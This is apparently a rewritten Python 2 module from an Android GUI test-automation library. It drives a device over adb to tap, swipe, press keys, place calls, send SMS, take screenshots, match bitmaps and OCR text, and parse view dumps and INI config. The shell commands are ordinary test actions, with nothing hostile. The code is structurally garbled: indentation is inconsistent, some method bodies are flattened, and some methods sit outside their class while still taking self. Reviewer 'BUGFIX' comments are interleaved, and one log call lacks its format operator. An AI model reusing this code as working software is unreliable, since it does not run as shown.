self.btName = self._conf.value("environment", "BTName")
self.btAccessory = self._conf.value("environment", "BTAccessory")
self.serverIP = self._conf.value("environment", "ServerIP")
self.androidUser = self._conf.value("environment", "AndroidUser")
self.voiceMailNumber = self._conf.value("environment", "VoiceMailNumber")
if self._conn: hw = self._conn._monkeyCommand("getvar build.device")[1]
else: hw = "nohardware"
self.hardware = self._conf.value("general", "hardware", hw)
self.bitmapPath = self._conf.value("paths", "bitmapPath", self._fmbtAndroidHomeDir + os.sep + "bitmaps" + os.sep + self.hardware + "-" + self.platformVersion() + ":.")
self.screenshotDir = self._conf.value("paths", "screenshotDir", self._fmbtAndroidHomeDir + os.sep + "screenshots")
if not os.path.isdir(self.screenshotDir):
try:
os.makedirs(self.screenshotDir)
_adapterLog('created directory "%s" for screenshots' % (self.screenshotDir,))
except Exception, e:
_adapterLog('creating directory "%s" for screenshots failed: %s' (self.screenshotDir, e))
raise
# Caches
self._itemCache = {}
def callContact(self, contact):
"""
Call to given contact.
Return True if successful, otherwise False.
"""
callCommand = 'service call phone 1 s16 "%s"' % (contact,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callContact", callCommand, status, out, err)
return False
else:
return True
def callNumber(self, number):
"""
Call to given phone number.
Return True if successful, otherwise False.
"""
callCommand = "service call phone 2 s16 %s" % (number,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callNumber", callCommand, status, out, err)
return False
else:
return True
def close(self):
if hasattr(self, "_conn"):
del self._conn
if hasattr(self, "_lastView"):
del self._lastView
if hasattr(self, "_lastScreenshot"):
del self._lastScreenshot
import gc
gc.collect()
    def dumpIni(self):
        """
        Returns contents of current device configuration as a string (in
        INI format).
        """
        return self._conf.dump()
    def drag(self, (x1, y1), (x2, y2), delayBetweenMoves=0.01, delayBeforeMoves=0, delayAfterMoves=0, movePoints=20):
        """
        Touch the screen on coordinates (x1, y1), drag along straight
        line to coordinates (x2, y2), and raise fingertip.

        coordinates (floats in range [0.0, 1.0] or integers):
                floating point coordinates in range [0.0, 1.0] are
                scaled to full screen width and height, others are
                handled as absolute coordinate values.

        delayBeforeMoves (float, optional):
                seconds to wait after touching and before dragging.

        delayBetweenMoves (float, optional):
                seconds to wait when moving between points when
                dragging.

        delayAfterMoves (float, optional):
                seconds to wait after dragging, before raising
                fingertip.

        movePoints (integer, optional):
                the number of intermediate move points between end
                points of the line.

        Returns True on success, False if sending input failed.
        """
        x1, y1 = self.intCoords((x1, y1))
        x2, y2 = self.intCoords((x2, y2))
        if not self._conn.sendTouchDown(x1, y1): return False
        time.sleep(delayBeforeMoves)
        # Interpolate movePoints evenly spaced positions along the line.
        for i in xrange(0, movePoints):
            nx = x1 + int(round(((x2 - x1) / float(movePoints+1)) * (i+1)))
            ny = y1 + int(round(((y2 - y1) / float(movePoints+1)) * (i+1)))
            if not self._conn.sendTouchMove(nx, ny): return False
            if i < movePoints - 1: time.sleep(delayBetweenMoves)
        time.sleep(delayAfterMoves)
        if self._conn.sendTouchUp(x2, y2): return True
        return False
    def intCoords(self, (x, y)):
        """
        Convert floating point coordinate values in range [0.0, 1.0] to
        screen coordinates.
        """
        width, height = self.screenSize()
        # Only floats in [0.0, 1.0] are scaled; other values pass through
        # as absolute pixel coordinates.
        if 0 <= x <= 1 and type(x) == float: x = x * width
        if 0 <= y <= 1 and type(y) == float: y = y * height
        return (int(round(x)), int(round(y)))
    def loadConfig(self, filenameOrObj, override=True, level=""):
        """Load device configuration from a filename or a file object.
        level is used only in log messages.  Failures are logged, not
        raised (best effort)."""
        try:
            if type(filenameOrObj) == str:
                filename = filenameOrObj
                fileObj = file(filenameOrObj)
            else:
                fileObj = filenameOrObj
                filename = getattr(fileObj, "name", "<string>")
                # Rewind reusable file objects before parsing.
                if hasattr(fileObj, "seek"):
                    fileObj.seek(0)
            self._conf.addFile(fileObj, override=override)
        except Exception, e:
            _adapterLog('Loading %s configuration from "%s" failed: %s' % (level, filename, e))
            return
        _adapterLog('Loaded %s configuration from "%s"' % (level, filename))
def platformVersion(self):
"""
Returns the platform version of the device.
"""
if self._platformVersion == None:
if self._conn:
self._platformVersion = self._conn.recvVariable("build.version.release")
else:
self._platformVersion = "nosoftware"
return self._platformVersion
    def pressBack(self, **pressKeyKwArgs):
        """
        Press the back button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_BACK", **pressKeyKwArgs)
    def pressHome(self, **pressKeyKwArgs):
        """
        Press the home button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_HOME", **pressKeyKwArgs)
def pressKey(self, keyName, long=False, hold=0.0):
"""
Press a key on the device.
Parameters:
keyName (string):
the name of the key, like KEYCODE_HOME. If KEYCODE_
prefix is not given, it is added. Refer to Android
KeyEvent documentation.
long (boolean, optional):
if True, press the key for long time.
hold (float, optional):
time in seconds to hold the key down.
"""
if not keyName.upper().startswith("KEYCODE_"):
keyName = "KEYCODE_" + keyName
keyName = keyName.upper()
if long and hold == None:
hold = self._longPressHoldTime
if hold > 0.0:
try:
assert self._conn.sendKeyDown(keyName)
time.sleep(hold)
assert self._conn.sendKeyUp(keyName)
except:
return False
return True
return self._conn.sendPress(keyName)
    def pressMenu(self, **pressKeyKwArgs):
        """
        Press the menu button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_MENU", **pressKeyKwArgs)
    def pressPower(self, **pressKeyKwArgs):
        """
        Press the power button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_POWER", **pressKeyKwArgs)
    def pressVolumeUp(self, **pressKeyKwArgs):
        """
        Press the volume up button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_VOLUME_UP", **pressKeyKwArgs)
    def pressVolumeDown(self, **pressKeyKwArgs):
        """
        Press the volume down button.

        Optional parameters are the same as for pressKey.
        """
        return self.pressKey("KEYCODE_VOLUME_DOWN", **pressKeyKwArgs)
    def reboot(self, reconnect=True, firstBoot=False):
        """
        Reboot the device.

        Parameters

          reconnect (boolean, optional)
                  If True, do not return until the device has been
                  connected after boot. Otherwise return once reboot
                  command has been sent. The default is True.

          firstBoot (boolean, optional)
                  If True, the device boots like it would have been
                  flashed. Requires that "adb root" works. The default
                  is False.

        Returns True on success, otherwise False.
        """
        # 120 s timeout for the device to come back after the reboot.
        return self._conn.reboot(reconnect, firstBoot, 120)
    def reconnect(self):
        """
        Close connections to the device and reconnect.
        """
        # Drop the old connection first so its resources are released
        # before a new one is opened.
        del self._conn
        try:
            self._conn = _AndroidDeviceConnection(self.serialNumber)
            return True
        except Exception, e:
            _adapterLog("reconnect failed: %s" % (e,))
            return False
def refreshScreenshot(self, forcedScreenshot=None):
"""
Takes new screenshot from the device and updates latest
screenshot object.
Parameters:
forcedScreenshot (Screenshot or string, optional):
use given screenshot or image file, do not take new
screenshot.
Returns created Screenshot object.
"""
if forcedScreenshot != None:
if type(forcedScreenshot) == str:
self._lastScreenshot = Screenshot(
screenshotFile=forcedScreenshot,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
else:
self._lastScreenshot = forcedScreenshot
else:
screenshotFile = self._conn.screenshot(screenshotDir=self.screenshotDir)
self._lastScreenshot = Screenshot(
screenshotFile=screenshotFile,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
return self._lastScreenshot
    def refreshView(self, forcedView=None):
        """
        (Re)reads view items on display and updates the latest View
        object.

        Parameters:

          forcedView (View or filename, optional):
                  use given View object or view file instead of reading
                  items from the device.

        Returns created View object.
        """
        def formatErrors(errors):
            # errors: iterable of (line, lineNumber, error) tuples from
            # View parsing -- TODO(review): confirm tuple layout.
            return "refreshView parse errors:\n %s" % (
                "\n ".join(["line %s: %s error: %s" % e for e in errors]),)
        if forcedView != None:
            if isinstance(forcedView, View):
                self._lastView = forcedView
            elif type(forcedView) == str:
                # NOTE(review): file() is Python 2 only.
                self._lastView = View(self.screenshotDir, self.serialNumber, file(forcedView).read())
                _adapterLog(formatErrors(self._lastView.errors()))
            else:
                raise ValueError("forcedView must be a View object or a filename")
            return self._lastView
        # Retry reading the window dump while it parses with errors.
        retryCount = 0
        while True:
            dump = self._conn.recvViewData()
            if dump == None: # dump unreadable
                return None
            view = View(self.screenshotDir, self.serialNumber, dump)
            if len(view.errors()) > 0 and retryCount < self._PARSE_VIEW_RETRY_LIMIT:
                _adapterLog(formatErrors(view.errors()))
                retryCount += 1
                time.sleep(0.2) # sleep before retry
            else:
                # successfully parsed or parsed with errors but no more retries
                self._lastView = view
                return view
    def screenshot(self):
        """
        Returns the latest Screenshot object.

        Use refreshScreenshot() to get a new screenshot.
        """
        return self._lastScreenshot
def screenSize(self):
"""
Returns screen size in pixels in tuple (width, height).
"""
if self._screenSize == None:
self._screenSize = self._conn.recvScreenSize()
return self._screenSize
    def shell(self, shellCommand):
        """
        Execute shellCommand in adb shell.

        shellCommand is a string (arguments separated by whitespace).

        Returns output of "adb shell" command.

        If you wish to receive exitstatus or standard output and error
        separated from shellCommand, refer to shellSOE().
        """
        return self._conn._runAdb(["shell", shellCommand])[1]
    def shellSOE(self, shellCommand):
        """
        Execute shellCommand in adb shell.

        shellCommand is a string (arguments separated by whitespace).

        Returns tuple (exitStatus, standardOutput, standardError).

        Requires tar and uuencode to be available on the device.
        """
        return self._conn.shellSOE(shellCommand)
    def smsNumber(self, number, message):
        """
        Send message using SMS to given number.

        Parameters:

          number (string)
                  phone number to which the SMS will be sent

          message (string)
                  the message to be sent.

        Returns True on success, otherwise False.
        """
        smsCommand = ('am start -a android.intent.action.SENDTO ' +
                      '-d sms:%s --es sms_body "%s"' +
                      ' --ez exit_on_sent true') % (number, message)
        status, out, err = self.shellSOE(smsCommand)
        if status != 0:
            _logFailedCommand("sms", smsCommand, status, out, err)
            return False
        _adapterLog("SMS command returned %s" % (out + err,))
        # Drive the messaging UI: focus the send button and press it.
        # NOTE(review): the fixed sleeps and key presses assume a stock
        # messaging app layout -- confirm on target device.
        time.sleep(2)
        self.pressKey("KEYCODE_DPAD_RIGHT")
        time.sleep(1)
        self.pressKey("KEYCODE_ENTER")
        return True
    def supportsView(self):
        """
        Check if connected device supports reading view data.

        View data is needed by refreshView(), view(), verifyText() and
        waitText(). It is produced by Android window dump.

        Returns True if view data can be read, otherwise False.
        """
        try:
            self._conn.recvViewData()
            return True
        except AndroidConnectionError:
            return False
    def swipe(self, (x, y), direction, **dragKwArgs):
        """
        swipe starting from coordinates (x, y) to direction ("n", "s",
        "e" or "w"). Swipe ends to the edge of the screen.

        Coordinates and keyword arguments are the same as for the drag
        function.

        Returns True on success, False if sending input failed.
        """
        d = direction.lower()
        # End point: same row/column as the start, at the screen edge.
        if d in ["n", "north"]: x2, y2 = self.intCoords((x, 0.0))
        elif d in ["s", "south"]: x2, y2 = self.intCoords((x, 1.0))
        elif d in ["e", "east"]: x2, y2 = self.intCoords((1.0, y))
        elif d in ["w", "west"]: x2, y2 = self.intCoords((0.0, y))
        else:
            msg = 'Illegal direction "%s"' % (direction,)
            _adapterLog(msg)
            raise Exception(msg)
        return self.drag((x, y), (x2, y2), **dragKwArgs)
def swipeBitmap(self, bitmap, direction, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **dragKwArgs):
"""
swipe starting from bitmap to direction ("n", "s", "e", or
"w"). Swipe ends to the edge of the screen.
Parameters:
colorMatch, area
refer to verifyBitmap documentation.
delayBeforeMoves, delayBetweenMoves, delayAfterMoves,
movePoints
refer to drag documentation.
Returns True on success, False if sending input failed.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("swipeBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.swipeItem(items[0], direction, **dragKwArgs)
    def swipeItem(self, viewItem, direction, **dragKwArgs):
        """
        swipe starting from viewItem to direction ("n", "s", "e" or
        "w"). Swipe ends to the edge of the screen.

        Keyword arguments are the same as for the drag function.

        Returns True on success, False if sending input failed.
        """
        return self.swipe(viewItem.coords(), direction, **dragKwArgs)
    def systemProperty(self, propertyName):
        """
        Returns Android Monkey Device properties, such as
        "clock.uptime", refer to Android Monkey documentation.
        """
        return self._conn.recvVariable(propertyName)
def tap(self, xy, long=False, hold=0.0):
    """
    Tap screen on coordinates (x, y).

    Parameters:
      xy (pair of floats in range [0.0, 1.0] or integers):
              floating point coordinates in range [0.0, 1.0] are
              scaled to full screen width and height, others are
              handled as absolute coordinate values.
      long (boolean, optional):
              if True, touch the screen for a long time
              (self._longTapHoldTime seconds). The default is False.
      hold (float, optional):
              time in seconds to touch the screen; overrides "long".

    Returns True if successful, otherwise False.
    """
    # Note: the Python 2 tuple parameter "(x, y)" was replaced by
    # explicit unpacking; callers always passed a single pair, so the
    # call interface is unchanged.
    x, y = self.intCoords(xy)
    # BUGFIX: the condition used to be "long and hold == None", which
    # was never true because hold defaults to 0.0 — tap(..., long=True)
    # silently degraded into a short tap. Apply the long-tap hold time
    # whenever no explicit positive hold time is given.
    if long and hold <= 0.0:
        hold = self._longTapHoldTime
    if hold > 0.0:
        # Long tap: press down, wait, release.
        try:
            assert self._conn.sendTouchDown(x, y)
            time.sleep(hold)
            assert self._conn.sendTouchUp(x, y)
        except:
            return False
        return True
    else:
        return self._conn.sendTap(x, y)
def tapBitmap(self, bitmap, **tapKwArgs):
    """
    Find a bitmap from the latest screenshot, and tap it.

    Returns True if successful, otherwise False.
    """
    assert self._lastScreenshot != None, "Screenshot required."
    matches = self._lastScreenshot.findItemsByBitmap(bitmap)
    if not matches:
        _adapterLog("tapBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
        return False
    return self.tapItem(matches[0], **tapKwArgs)
def tapId(self, viewItemId, **tapKwArgs):
    """
    Find an item with given id from the latest view, and tap it.

    Returns True if successful, otherwise False.
    """
    assert self._lastView != None, "View required."
    found = self._lastView.findItemsById(viewItemId, count=1)
    if not found:
        _adapterLog("tapItemById(%s): no items found" % (viewItemId,))
        return False
    return self.tapItem(found[0], **tapKwArgs)
def tapItem(self, viewItem, **tapKwArgs):
    """
    Tap the center point of viewItem.

    Returns True if successful, otherwise False.
    """
    center = viewItem.coords()
    return self.tap(center, **tapKwArgs)
def tapOcrText(self, word, match=1.0, preprocess=None, **tapKwArgs):
    """
    Find the given word from the latest screenshot using OCR, and
    tap it.

    Parameters:
      word (string):
              the word to be tapped.
      match (float, optional):
              minimum match score in range [0.0, 1.0].
              The default is 1.0 (exact match).
      preprocess (string, optional):
              preprocess filter to be used in OCR for better
              result. Refer to eyenfinger.autoconfigure to search
              for a good one.
      long, hold (optional):
              refer to tap documentation.

    Returns True if successful, otherwise False.
    """
    assert self._lastScreenshot != None, "Screenshot required."
    found = self._lastScreenshot.findItemsByOcr(
        word, match=match, preprocess=preprocess)
    if not found:
        return False
    return self.tapItem(found[0], **tapKwArgs)
def tapText(self, text, partial=False, **tapKwArgs):
    """
    Find an item with given text from the latest view, and tap it.

    Parameters:
      partial (boolean, optional):
              refer to verifyText documentation. The default is
              False.
      long, hold (optional):
              refer to tap documentation.

    Returns True if successful, otherwise False.
    """
    assert self._lastView != None, "View required."
    found = self._lastView.findItemsByText(text, partial=partial, count=1)
    if not found:
        return False
    return self.tapItem(found[0], **tapKwArgs)
def topApp(self):
    """
    Returns the name of the top application.
    """
    appName, _ = self._conn.recvTopAppWindow()
    return appName
def topWindow(self):
    """
    Returns the name of the top window.
    """
    _, windowName = self._conn.recvTopAppWindow()
    return windowName
def type(self, text):
    """
    Type text on the device.

    Returns True on success, False if sending input failed.
    """
    # Note: this method name shadows the built-in type() inside the class.
    return self._conn.sendType(text)
def verifyOcrText(self, word, match=1.0, preprocess=None):
    """
    Verify using OCR that the last screenshot contains the given word.

    Parameters:
      word (string):
              the word to be searched for.
      match (float, optional):
              minimum match score in range [0.0, 1.0].
              The default is 1.0 (exact match).
      preprocess (string, optional):
              preprocess filter to be used in OCR for better
              result. Refer to eyenfinger.autoconfigure to search
              for a good one.

    Returns True if the word was found, otherwise False.
    """
    # (The old docstring mentioned "long, hold" parameters copy-pasted
    # from tap; this method takes no such parameters.)
    assert self._lastScreenshot != None, "Screenshot required."
    return self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess) != []
def verifyText(self, text, partial=False):
    """
    Verify that the last view has at least one item with given
    text.

    Parameters:
      text (string):
              text to be searched for in items.
      partial (boolean, optional):
              if True, match items if item text contains given
              text, otherwise match only if item text is equal to
              the given text. The default is False (exact match).
    """
    assert self._lastView != None, "View required."
    found = self._lastView.findItemsByText(text, partial=partial, count=1)
    return len(found) > 0
def verifyBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
    """
    Verify that bitmap is present in the last screenshot.

    Parameters:
      bitmap (string):
              filename of the bitmap file to be searched for.
      colorMatch (float, optional):
              required color matching accuracy. The default is 1.0
              (exact match). For instance, 0.75 requires that
              every pixel's every RGB component value on the
              bitmap is at least 75 % match with the value of
              corresponding pixel's RGB component in the
              screenshot.
      area ((left, top, right, bottom), optional):
              search bitmap from the given area only. Left, top
              right and bottom are either absolute coordinates
              (integers) or floats in range [0.0, 1.0]. In the
              latter case they are scaled to screenshot
              dimensions. The default is (0.0, 0.0, 1.0, 1.0),
              that is, search everywhere in the screenshot.

    Returns True if the bitmap was found, otherwise False.
    """
    assert self._lastScreenshot != None, "Screenshot required."
    # BUGFIX (dead code): the old "if self._lastScreenshot == None:
    # return False" branch was unreachable after the assert above and
    # has been removed.
    return self._lastScreenshot.findItemsByBitmap(
        bitmap, colorMatch=colorMatch, area=area) != []
def view(self):
    """
    Returns the last view (the most recently refreshed view).
    """
    # NOTE(review): presumably None until a view has been refreshed —
    # confirm against refreshView/__init__ (not visible here).
    return self._lastView
def wait(self, refreshFunc, waitFunc, waitFuncArgs, waitFuncKwargs=None, waitTime = 5.0, pollDelay = 1.0):
    """
    Wait until waitFunc returns True or waitTime has expired.

    Parameters:
      refreshFunc (function):
              this function is called before re-evaluating
              waitFunc. For instance, refreshView or
              refreshScreenshot.
      waitFunc, waitFuncArgs, waitFuncKwargs (function, tuple,
      dictionary):
              wait for waitFunc(*waitFuncArgs, **waitFuncKwargs) to
              return True
      waitTime (float, optional):
              max. time in seconds to wait for.
      pollDelay (float, optional):
              time in seconds to sleep between refreshes.

    Returns True if waitFunc returns True - either immediately or
    before waitTime has expired - otherwise False.
    """
    # BUGFIX (anti-pattern): waitFuncKwargs defaulted to a mutable {}
    # shared between calls; use a None sentinel instead.
    if waitFuncKwargs == None:
        waitFuncKwargs = {}
    if waitFunc(*waitFuncArgs, **waitFuncKwargs):
        return True
    startTime = time.time()
    endTime = startTime + waitTime
    now = startTime
    while now < endTime:
        # Never sleep past the deadline.
        time.sleep(min(pollDelay, (endTime - now)))
        now = time.time()
        refreshFunc()
        if waitFunc(*waitFuncArgs, **waitFuncKwargs):
            return True
    return False
def waitBitmap(self, bitmap, colorMatch=None, area=None, **waitKwArgs):
    """
    Wait until bitmap appears on screen.

    Parameters:
      bitmap (string):
              filename of the bitmap to be waited for.
      colorMatch, area (optional):
              refer to verifyBitmap documentation.
      waitTime, pollDelay (float, optional):
              refer to wait documentation.

    Returns True if bitmap appeared within given time limit,
    otherwise False.

    Updates the last screenshot.
    """
    # Forward colorMatch/area only when explicitly given, so that
    # verifyBitmap's own defaults stay in effect otherwise.
    verifyKwArgs = {}
    if colorMatch != None:
        verifyKwArgs['colorMatch'] = colorMatch
    if area != None:
        verifyKwArgs['area'] = area
    return self.wait(self.refreshScreenshot, self.verifyBitmap,
                     (bitmap,), verifyKwArgs, **waitKwArgs)
def waitText(self, text, partial=False, **waitKwArgs):
    """
    Wait until text appears in any view item.

    Parameters:
      text (string):
              text to be waited for.
      partial (boolean, optional):
              refer to verifyText. The default is False.
      waitTime, pollDelay (float, optional):
              refer to wait.

    Returns True if text appeared within given time limit,
    otherwise False.

    Updates the last view.
    """
    verifyKwArgs = {'partial': partial}
    return self.wait(self.refreshView, self.verifyText,
                     (text,), verifyKwArgs, **waitKwArgs)
def _bitmapFilename(self, bitmap, checkReadable=True):
    # Resolve a bitmap name into a filename.
    #
    # If bitmap is an absolute path or is readable as given, search only
    # its own directory. Otherwise search every directory in
    # self.bitmapPath (colon-separated); relative entries are taken
    # relative to self._fmbtAndroidHomeDir.
    if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
        path = [os.path.dirname(bitmap)]
        bitmap = os.path.basename(bitmap)
    else:
        path = []
        for singleDir in self.bitmapPath.split(":"):
            if not singleDir.startswith("/"):
                path.append(os.path.join(self._fmbtAndroidHomeDir, singleDir))
            else:
                path.append(singleDir)
    # First readable candidate wins; if none is readable, retval is the
    # last candidate tried. NOTE(review): if path were empty, retval
    # would be unbound here — assumes bitmapPath is non-empty.
    for singleDir in path:
        retval = os.path.join(singleDir, bitmap)
        if not checkReadable or os.access(retval, os.R_OK):
            break
    if checkReadable and not os.access(retval, os.R_OK):
        raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
    return retval
def _loadDeviceAndTestINIs(self, homeDir, deviceName, iniFile):
if deviceName != None:
_deviceIniFilename = homeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
if iniFile:
self.loadConfig(iniFile, override=True, level="test")
class _DeviceConf:
"""
Miniparser for INI files like:
[section1]
key1 = value1
; commented = out
# commented = out
"""
def __init__(self, fileObj=None):
# _conf is a dictionary:
# (section, key) -> value
self._conf = {}
if fileObj:
self.addFile(fileObj)
def addFile(self, fileObj, override=True):
for line in fileObj:
line = line.strip()
if line.startswith('[') and line.endswith(']'):
section = line[1:-1].strip()
elif line.startswith(";") or line.startswith("#"):
continue
elif '=' in line:
key, value = line.split('=')
if override or (section, key.strip()) not in self._conf:
self._conf[(section, key.strip())] = value.strip()
def sections(self):
return list(set([k[0] for k in self._conf.keys()]))
def keys(self, section):
return [k[1] for k in self._conf.keys() if k[0] == section]
def dump(self):
lines = []
for section in sorted(self.sections()):
lines.append("[%s]" % (section,))
for key in sorted(self.keys(section)):
lines.append("%-16s = %s" % (key, self._conf[(section, key)]))
lines.append("")
return "\n".join(lines)
def set(self, section, key, value):
self._conf[(section, key)] = value
def value(self, section, key, default=""):
"""
Returns the value associated with the key in the section.
The default is returned if the key is not found.
dump() will dump also sections and keys with
default values that have been returned.
"""
if not (section, key) in self._conf:
self._conf[(section, key)] = default
return self._conf[(section, key)]
class Screenshot(object):
    """
    Screenshot class takes and holds a screenshot (bitmap) of device
    display, or a forced bitmap file if device connection is not given.
    """
    def __init__(self, screenshotFile=None, pathSolver=None, screenSize=None):
        # pathSolver maps bitmap names to readable filenames
        # (see Device._bitmapFilename); screenSize is (width, height).
        self._filename = screenshotFile
        self._pathSolver = pathSolver
        self._screenSize = screenSize
        # The bitmap held inside screenshot object is never updated.
        # If new screenshot is taken, this screenshot object disappears.
        # => cache all search hits
        self._cache = {}
        # OCR results per preprocess filter, filled lazily by
        # _assumeOcrWords.
        self._ocrWords = None
        self._ocrPreprocess = _OCRPREPROCESS
    def dumpOcrWords(self, preprocess=None):
        # Return sorted (word, x1, y1) tuples of every OCR-detected
        # word, ordered roughly top-to-bottom (y bucketed by 8 pixels),
        # then left-to-right.
        self._assumeOcrWords(preprocess=preprocess)
        w = []
        for ppfilter in self._ocrWords:
            for word in self._ocrWords[ppfilter]:
                for appearance, (wid, middle, bbox) in enumerate(self._ocrWords[ppfilter][word]):
                    (x1, y1, x2, y2) = bbox
                    w.append((word, x1, y1))
        return sorted(set(w), key=lambda i:(i[2]/8, i[1]))
    def filename(self):
        return self._filename
    def findItemsByBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
        # Search bitmap in the screenshot. Results are cached per
        # (bitmap, colorMatch) because the underlying image never
        # changes for this object.
        bitmap = self._pathSolver(bitmap)
        if (bitmap, colorMatch) in self._cache:
            return self._cache[(bitmap, colorMatch)]
        eyenfinger.iRead(source=self._filename, ocr=False)
        try:
            score, bbox = eyenfinger.iVerifyIcon(bitmap, colorMatch=colorMatch, opacityLimit=.95, area=area)
            foundItem = self._item("bitmap", bbox, bitmap=bitmap)
            self._cache[(bitmap, colorMatch)] = [foundItem]
        except eyenfinger.BadMatch:
            _adapterLog('findItemsByBitmap no match for "%s" in "%s"' % (bitmap, self._filename))
            self._cache[(bitmap, colorMatch)] = []
        return self._cache[(bitmap, colorMatch)]
    def findItemsByOcr(self, text, preprocess=None, match=1.0):
        # Try each preprocess filter until one produces a good enough
        # match; return [] when none does (for-else).
        self._assumeOcrWords(preprocess=preprocess)
        for ppfilter in self._ocrWords.keys():
            try:
                eyenfinger._g_words = self._ocrWords[ppfilter]
                (score, word), bbox = eyenfinger.iVerifyWord(text, match=match)
                break
            except eyenfinger.BadMatch:
                continue
        else:
            return []
        return [self._item("OCR word", bbox, ocrFind=text, ocrFound=word)]
    def save(self, fileOrDirName):
        # Copy the screenshot image file to the given file or directory.
        shutil.copy(self._filename, fileOrDirName)
    def _assumeOcrWords(self, preprocess=None):
        # Run OCR lazily, only once per screenshot object.
        if self._ocrWords == None:
            if preprocess == None:
                preprocess = self._ocrPreprocess
            if not type(preprocess) in (list, tuple):
                preprocess = [preprocess]
            self._ocrWords = {}
            for ppfilter in preprocess:
                # Scale to twice the screen width before OCR.
                pp = ppfilter % { "zoom": "-resize %sx" % (self._screenSize[0] * 2) }
                eyenfinger.iRead(source=self._filename, ocr=True, preprocess=pp)
                self._ocrWords[ppfilter] = eyenfinger._g_words
    def _item(self, className, (x1, y1, x2, y2), bitmap=None, ocrFind=None, ocrFound=None):
        # Wrap a bounding box into a ViewItem so screenshot hits and
        # view hits share the same interface (coords(), bbox(), ...).
        return ViewItem(
            className, None, 0,
            {"layout:mLeft": x1,
             "layout:mTop": y1,
             "layout:getHeight()": y2-y1,
             "layout:getWidth()": x2-x1,
             "screenshot": self._filename,
             "bitmap": bitmap,
             "ocrFind": ocrFind,
             "ocrFound": ocrFound,
             },
            None, "")
    def __str__(self):
        return 'Screenshot(filename="%s")' % (self._filename,)
class ViewItem(object):
    """
    ViewItem holds the information of a single GUI element.
    """
    def __init__(self, className, code, indent, properties, parent, rawProps):
        self._className = className
        self._code = code
        self._indent = indent
        self._p = properties
        self._parent = parent
        self._children = []
        self._bbox = []  # computed lazily in bbox()
        # BUGFIX: rawProps used to be discarded (self._rawProps = ""),
        # which made View.findItemsByRawProps match nothing.
        self._rawProps = rawProps
        # Default missing scroll offsets to 0 so bbox() arithmetic works.
        if not "scrolling:mScrollX" in self._p:
            self._p["scrolling:mScrollX"] = 0
            self._p["scrolling:mScrollY"] = 0
    def addChild(self,child): self._children.append(child)
    def bbox(self):
        """
        Returns (left, top, right, bottom) of the item in absolute
        coordinates, accumulating ancestors' positions and scroll
        offsets.
        """
        if self._bbox == []:
            left = int(self._p["layout:mLeft"])
            top = int(self._p["layout:mTop"])
            parent = self._parent
            while parent:
                pp = parent._p
                left += int(pp["layout:mLeft"]) - int(pp["scrolling:mScrollX"])
                top += int(pp["layout:mTop"]) - int(pp["scrolling:mScrollY"])
                parent = parent._parent
            height = int(self._p["layout:getHeight()"])
            width = int(self._p["layout:getWidth()"])
            self._bbox = (left, top, left + width, top + height)
        return self._bbox
    def children(self): return self._children
    def className(self): return self._className
    def code(self): return self._code
    def coords(self):
        """Returns the center point of the item."""
        left, top, right, bottom = self.bbox()
        return (left + (right-left)/2, top + (bottom-top)/2)
    def indent(self): return self._indent
    def id(self): return self.property("mID")
    def parent(self): return self._parent
    def properties(self): return self._p
    def property(self, propertyName):
        # None if the property does not exist.
        return self._p.get(propertyName, None)
    def text(self): return self.property("text:mText")
    def visible(self):
        return self._p.get("getVisibility()", "") == "VISIBLE"
    def dump(self):
        p = self._p
        return ("ViewItem(\n\tchildren = %d\n\tclassName = '%s'\n\tcode = '%s'\n\t" +
                "indent = %d\n\tproperties = {\n\t\t%s\n\t})") % (
            len(self._children), self._className, self._code, self._indent,
            '\n\t\t'.join(['"%s": %s' % (key, p[key]) for key in sorted(p.keys())]))
    def __str__(self):
        return ("ViewItem(className='%s', id=%s, bbox=%s)" % (
            self._className, self.id(), self.bbox()))
class View(object):
    """
    View provides interface to screen dumps from Android. It parses
    the dump to a hierarchy of ViewItems. find* methods enable searching
    for ViewItems based on their properties.
    """
    def __init__(self, screenshotDir, serialNumber, dump):
        self.screenshotDir = screenshotDir
        self.serialNumber = serialNumber
        self._viewItems = []
        self._errors = []
        # Two dump formats: "Class@8hexdigits props..." and an older one
        # with a short id. Raw strings avoid invalid-escape issues.
        self._lineRegEx = re.compile(r"(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>[0-9A-Fa-f]{8} )(?P<properties>.*)")
        self._olderAndroidLineRegEx = re.compile(r"(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>\w)(?P<properties>.*)")
        self._propRegEx = re.compile(r"(?P<prop>(?P<name>[^=]+)=(?P<len>\d+),)(?P<data>[^\s]* ?)")
        self._dump = dump
        self._rawDumpFilename = self.screenshotDir + os.sep + _filenameTimestamp() + "-" + self.serialNumber + ".view"
        # MODERNIZED: open() + with instead of Python-2-only file();
        # the handle is now closed deterministically.
        with open(self._rawDumpFilename, "w") as f:
            f.write(self._dump)
        try: self._parseDump(dump)
        except Exception:
            self._errors.append((-1, "", "Parser error"))
    def viewItems(self): return self._viewItems
    def errors(self): return self._errors
    def dumpRaw(self): return self._dump
